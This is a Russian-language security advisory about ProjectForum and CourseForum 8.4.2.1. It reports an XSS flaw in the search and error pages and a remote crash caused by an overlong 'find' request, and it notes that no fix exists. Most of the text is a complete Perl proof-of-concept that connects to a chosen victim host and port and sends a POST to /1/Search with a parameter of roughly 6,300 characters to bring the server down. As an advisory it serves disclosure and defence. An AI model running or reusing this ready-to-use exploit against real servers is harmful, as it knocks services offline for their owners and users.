Дата публикации: | 24.12.2003 |
Всего просмотров: | 1646 |
Опасность: | Средняя |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Межсайтовый скриптинг Отказ в обслуживании |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: |
ProjectForum 3.x
CourseForum 3.x |
Уязвимые версии: ProjectForum и CourseForum 8.4.2.1
Описание: Несколько уязвимостей обнаружено в ProjectForum и CourseForum. Удаленный пользователь может аварийно завершить работу приложения. Удаленный пользователь может выполнить XSS нападение. Удаленный пользователь может послать чрезмерно длинный 'find' запрос к целевому серверу, чтобы аварийно завершить работу 'projectforum.exe'. Также программа не фильтрует HTML код, перед отображением информации пользователю в функции find и странице ошибки. Пример/Эксплоит: ############################### [pfdos.pl] ############################### #!/usr/bin/perl -w ############################################################ # # # ProjectForum 8.4.2.1 and below DoS Proof of Concept Code # # by Peter Winter-Smith [peter4020@hotmail.com] # # # ############################################################ use IO::Socket; if(!($ARGV[1])) print "\nUsage: pfdos.pl <victim> <port>\n" . "\tdefault port is 3455\n\n"; exit; $victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0], PeerPort=>$ARGV[1]) or die "Unable to connect to $ARGV[0] " . "on port $ARGV[1]"; $DoSpacket = '' . 'POST /1/Search HTTP/1.1' . "\x0d\x0a" . 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, ' . 'application/x-gsarcade-launch, application/vnd.ms-excel, ' . 'application/vnd.ms-powerpoint, application/msword, ' . 'application/x-shockwave-flash, */*' . "\x0d\x0a" . 'Referer: http://localhost:3455/1/Search' . "\x0d\x0a" . 'Accept-Language: en-gb..Content-Type: application/x-www-form-' . 'urlencoded' . "\x0d\x0a" . 'Accept-Encoding: gzip, deflate' . "\x0d\x0a" . 'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ' . 'xxxxxxxxxxxxx' . "\x20" . '1.0.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322)' . "\x0d\x0a" . 'Host: localhost:3455' . "\x0d\x0a" . 'Content-Length: 6306' . "\x0d\x0a" . 'Connection: Keep-Alive' . "\x0d\x0a" . 'Cache-Control: no-cache' . "\x0d\x0a" . "\x0d\x0a" . 'q=' . 'a'x6292 . '&action=Find' . "\x0d\x0a"; print $victim $DoSpacket; print " + Making Request ...\n + Server should be dead!!\n"; sleep(4); close($victim); print "Done.\n"; exit; URL производителя: http://www.projectforum.com/projectforum Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | ProjectForum Multiple Vulnerabilities |